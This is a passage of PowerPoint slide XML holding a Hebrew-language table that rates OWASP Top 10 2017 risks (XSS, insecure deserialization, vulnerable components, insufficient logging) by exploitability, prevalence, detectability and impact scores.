                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7:2017-Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נפוצה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מתונה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – פתיחה לא מאובטחת של רצף סדרתי (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Serialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קשה: 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:sym typeface="Wingdings"/>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CB1D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חמורה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - שימוש ברכיבים עם פגיעויות ידועות</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נפוצה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מתונה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>4.7</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - תיעוד וניטור בלתי מספקים</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נפוצה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קשה: 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:sym typeface="Wingdings"/>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CB1D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מתונה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
